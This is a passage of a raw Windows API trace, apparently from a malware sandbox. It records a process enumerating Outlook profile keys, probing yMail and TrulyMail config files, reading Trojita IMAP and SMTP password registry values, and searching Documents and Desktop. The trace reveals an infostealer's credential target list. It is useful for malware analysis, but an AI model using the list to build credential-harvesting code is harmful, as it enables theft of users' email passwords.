returned 0x780000 [0316.045] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0316.045] GetProcessHeap () returned 0x780000 [0316.045] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79ca28 [0316.046] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.047] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a") returned 88 [0316.047] GetProcessHeap () returned 0x780000 [0316.047] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0316.047] GetProcessHeap () returned 0x780000 [0316.047] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.047] GetProcessHeap () returned 0x780000 [0316.047] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b400 [0316.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.048] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a", phkResult=0x79b400 | out: phkResult=0x79b400*=0x204) returned 0x0 [0316.049] GetProcessHeap () returned 0x780000 [0316.049] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0316.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.050] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0316.050] GetProcessHeap () returned 0x780000 [0316.050] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0316.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.053] RegCloseKey (hKey=0x204) returned 0x0 [0316.053] GetProcessHeap () returned 0x780000 [0316.053] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b400 | out: hHeap=0x780000) returned 1 [0316.053] GetProcessHeap () returned 0x780000 [0316.053] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.054] RegCloseKey (hKey=0x210) returned 0x0 [0316.054] GetProcessHeap () returned 0x780000 [0316.054] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b490 | out: hHeap=0x780000) returned 1 [0316.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.055] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xb, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="e57f6d0b27b6134693ca7113a4ab34a6", pcchName=0x19fb7c) returned 0x0 [0316.055] GetProcessHeap () returned 0x780000 [0316.055] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b3f0 [0316.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.057] RegOpenKeyW (in: hKey=0x218, lpSubKey="e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x79b3f0 | out: phkResult=0x79b3f0*=0x210) returned 0x0 [0316.057] GetProcessHeap () returned 0x780000 [0316.057] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0316.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.058] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0316.058] GetProcessHeap () returned 0x780000 [0316.058] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0316.058] GetProcessHeap () returned 0x780000 [0316.058] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79ca28 [0316.059] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.060] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6") returned 88 [0316.060] GetProcessHeap () returned 0x780000 [0316.060] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0316.060] GetProcessHeap () returned 0x780000 [0316.061] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.061] GetProcessHeap () returned 0x780000 [0316.061] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b4f0 [0316.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.062] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x79b4f0 | out: phkResult=0x79b4f0*=0x204) returned 0x0 [0316.062] GetProcessHeap () returned 0x780000 [0316.062] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0316.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.063] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0316.063] GetProcessHeap () returned 0x780000 [0316.063] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0316.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.065] RegCloseKey (hKey=0x204) returned 0x0 [0316.065] GetProcessHeap () returned 0x780000 [0316.065] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4f0 | out: hHeap=0x780000) returned 1 [0316.065] GetProcessHeap () returned 0x780000 [0316.065] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.068] RegCloseKey (hKey=0x210) returned 0x0 [0316.069] GetProcessHeap () returned 0x780000 [0316.069] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b3f0 | out: hHeap=0x780000) returned 1 [0316.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.070] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xc, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="f35c115766b7c94cb080da6869ae8f9d", pcchName=0x19fb7c) returned 0x0 [0316.070] GetProcessHeap () returned 0x780000 [0316.070] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b360 [0316.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.071] RegOpenKeyW (in: hKey=0x218, lpSubKey="f35c115766b7c94cb080da6869ae8f9d", phkResult=0x79b360 | out: phkResult=0x79b360*=0x210) returned 0x0 [0316.071] GetProcessHeap () returned 0x780000 [0316.071] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0316.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.072] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0316.072] GetProcessHeap () returned 0x780000 [0316.073] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0316.073] GetProcessHeap () returned 0x780000 [0316.073] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79ca28 [0316.074] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.074] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d") returned 88 [0316.074] GetProcessHeap () returned 0x780000 [0316.074] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0316.074] GetProcessHeap () returned 0x780000 [0316.075] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.075] GetProcessHeap () returned 0x780000 [0316.075] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b3c0 [0316.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.076] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d", phkResult=0x79b3c0 | out: phkResult=0x79b3c0*=0x204) returned 0x0 [0316.076] GetProcessHeap () returned 0x780000 [0316.076] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0316.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.077] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0316.078] GetProcessHeap () returned 0x780000 [0316.078] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0316.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.079] RegCloseKey (hKey=0x204) returned 0x0 [0316.079] GetProcessHeap () returned 0x780000 [0316.079] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b3c0 | out: hHeap=0x780000) returned 1 [0316.079] GetProcessHeap () returned 0x780000 [0316.080] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.081] RegCloseKey (hKey=0x210) returned 0x0 [0316.081] GetProcessHeap () returned 0x780000 [0316.081] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b360 | out: hHeap=0x780000) returned 1 [0316.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.086] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xd, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="f86ed2903a4a11cfb57e524153480001", pcchName=0x19fb7c) returned 0x0 [0316.086] GetProcessHeap () returned 0x780000 [0316.086] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b350 [0316.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.088] RegOpenKeyW (in: hKey=0x218, lpSubKey="f86ed2903a4a11cfb57e524153480001", phkResult=0x79b350 | out: phkResult=0x79b350*=0x210) returned 0x0 [0316.088] GetProcessHeap () returned 0x780000 [0316.088] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0316.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.089] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0316.089] GetProcessHeap () returned 0x780000 [0316.089] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0316.089] GetProcessHeap () returned 0x780000 [0316.089] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79ca28 [0316.090] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.091] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001") returned 88 [0316.091] GetProcessHeap () returned 0x780000 [0316.091] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0316.091] GetProcessHeap () returned 0x780000 [0316.091] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.092] GetProcessHeap () returned 0x780000 [0316.092] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b360 [0316.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.093] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", phkResult=0x79b360 | out: phkResult=0x79b360*=0x204) returned 0x0 [0316.093] GetProcessHeap () returned 0x780000 [0316.093] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0316.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.094] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0316.094] GetProcessHeap () returned 0x780000 [0316.095] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0316.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.096] RegCloseKey (hKey=0x204) returned 0x0 [0316.096] GetProcessHeap () returned 0x780000 [0316.096] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b360 | out: hHeap=0x780000) returned 1 [0316.096] GetProcessHeap () returned 0x780000 [0316.096] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.098] RegCloseKey (hKey=0x210) returned 0x0 [0316.098] GetProcessHeap () returned 0x780000 [0316.098] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b350 | out: hHeap=0x780000) returned 1 [0316.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.099] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xe, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="", pcchName=0x19fb7c) returned 0x103 [0316.099] GetProcessHeap () returned 0x780000 [0316.100] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b910 | out: hHeap=0x780000) returned 1 [0316.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.101] RegCloseKey (hKey=0x218) returned 0x0 [0316.101] GetProcessHeap () returned 0x780000 [0316.101] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b440 | out: hHeap=0x780000) returned 1 [0316.101] GetProcessHeap () returned 0x780000 [0316.102] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0316.102] GetProcessHeap () returned 0x780000 [0316.102] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b640 | out: hHeap=0x780000) returned 1 [0316.185] GetProcessHeap () returned 0x780000 [0316.185] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.185] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.186] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0316.186] GetProcessHeap () returned 0x780000 [0316.186] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79ca28 [0316.187] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.188] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\yMail2\\POP3.xml", arglist=0x19fae8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 47 [0316.188] GetProcessHeap () returned 0x780000 [0316.188] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x62) returned 0x79a760 [0316.188] GetProcessHeap () returned 0x780000 [0316.188] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.189] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 0 [0316.190] GetProcessHeap () returned 0x780000 [0316.190] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a760 | out: hHeap=0x780000) returned 1 [0316.191] GetProcessHeap () returned 0x780000 [0316.192] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.192] GetProcessHeap () returned 0x780000 [0316.192] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.192] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.193] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0316.193] GetProcessHeap () returned 0x780000 [0316.193] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79ca28 [0316.194] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.195] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\yMail2\\SMTP.xml", arglist=0x19fadc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 47 [0316.195] GetProcessHeap () returned 0x780000 [0316.195] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x62) returned 0x79a760 [0316.195] GetProcessHeap () returned 0x780000 [0316.195] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.196] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 0 [0316.196] GetProcessHeap () returned 0x780000 [0316.197] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a760 | out: hHeap=0x780000) returned 1 [0316.197] GetProcessHeap () returned 0x780000 [0316.198] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.198] GetProcessHeap () returned 0x780000 [0316.198] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.199] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.199] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0316.200] GetProcessHeap () returned 0x780000 [0316.200] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6c) returned 0x79ca28 [0316.200] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.201] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\yMail2\\Accounts.xml", arglist=0x19fad0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 51 [0316.201] GetProcessHeap () returned 0x780000 [0316.201] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x6a) returned 0x79a760 [0316.202] GetProcessHeap () returned 0x780000 [0316.202] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.203] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 0 [0316.203] GetProcessHeap () returned 0x780000 [0316.204] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a760 | out: hHeap=0x780000) returned 1 [0316.204] GetProcessHeap () returned 0x780000 [0316.204] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.204] GetProcessHeap () returned 0x780000 [0316.204] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.205] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.206] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0316.206] GetProcessHeap () returned 0x780000 [0316.206] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79ca28 [0316.207] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.208] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\yMail\\ymail.ini", arglist=0x19fac4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 47 [0316.208] GetProcessHeap () returned 0x780000 [0316.208] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x62) returned 0x79a760 [0316.208] GetProcessHeap () returned 0x780000 [0316.209] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.210] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 0 [0316.210] GetProcessHeap () returned 0x780000 [0316.210] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a760 | out: hHeap=0x780000) returned 1 [0316.210] GetProcessHeap () returned 0x780000 [0316.210] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.210] GetProcessHeap () returned 0x780000 [0316.211] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79b520 [0316.211] GetProcessHeap () returned 0x780000 [0316.211] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b640 [0316.211] GetProcessHeap () returned 0x780000 [0316.211] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79b910 [0316.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.212] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="imap.auth.pass", pdwType=0x0, pvData=0x79b910, pcbData=0x19fa1c*=0x104 | out: pdwType=0x0, pvData=0x79b910, pcbData=0x19fa1c*=0x104) returned 0x2 [0316.212] GetProcessHeap () returned 0x780000 [0316.212] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b910 | out: hHeap=0x780000) returned 1 [0316.212] GetProcessHeap () returned 0x780000 [0316.212] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79b910 [0316.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.213] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="msa.smtp.auth.pass", pdwType=0x0, pvData=0x79b910, pcbData=0x19fa1c*=0x104 | out: pdwType=0x0, pvData=0x79b910, pcbData=0x19fa1c*=0x104) returned 0x2 [0316.213] GetProcessHeap () returned 0x780000 [0316.214] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b910 | out: hHeap=0x780000) returned 1 [0316.214] GetProcessHeap () returned 0x780000 [0316.214] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0316.214] GetProcessHeap () returned 0x780000 [0316.214] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b640 | out: hHeap=0x780000) returned 1 [0316.214] GetProcessHeap () returned 0x780000 [0316.214] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8c) returned 0x79ca28 [0316.215] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.216] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\TrulyMail\\Data\\Settings\\user.config", arglist=0x19fb40 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 73 [0316.216] GetProcessHeap () returned 0x780000 [0316.216] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x96) returned 0x79a2e8 [0316.216] GetProcessHeap () returned 0x780000 [0316.216] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.217] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 0 [0316.217] GetProcessHeap () returned 0x780000 [0316.218] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.218] GetProcessHeap () returned 0x780000 [0316.218] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x12c) returned 0x79a2e8 [0316.218] GetProcessHeap () returned 0x780000 [0316.218] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b640 [0316.218] GetProcessHeap () returned 0x780000 [0316.218] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.219] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.219] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0316.220] Sleep (dwMilliseconds=0xa) [0316.244] GetProcessHeap () returned 0x780000 [0316.244] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79ca28 [0316.245] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.246] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s", arglist=0x19f8fc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn") returned 37 [0316.246] GetProcessHeap () returned 0x780000 [0316.246] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4e) returned 0x79a760 [0316.246] GetProcessHeap () returned 0x780000 [0316.247] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.247] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.spn"), lpFindFileData=0x19f910 | out: lpFindFileData=0x19f910*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x787868, ftLastWriteTime.dwHighDateTime=0x787868, nFileSizeHigh=0x793fd8, nFileSizeLow=0x7946b8, dwReserved0=0x0, dwReserved1=0x19f96c, cFileName="ը瞆", cAlternateFileName="뒭蕬͈읩葊㓛ﭴ\x19䂑@")) returned 0xffffffff [0316.248] GetProcessHeap () returned 0x780000 [0316.248] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a760 | out: hHeap=0x780000) returned 1 [0316.248] GetProcessHeap () returned 0x780000 [0316.248] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.248] GetProcessHeap () returned 0x780000 [0316.248] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.249] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.250] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0316.251] Sleep (dwMilliseconds=0xa) [0316.274] GetProcessHeap () returned 0x780000 [0316.274] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79ca28 [0316.275] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.276] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s", arglist=0x19f8e4 | out: 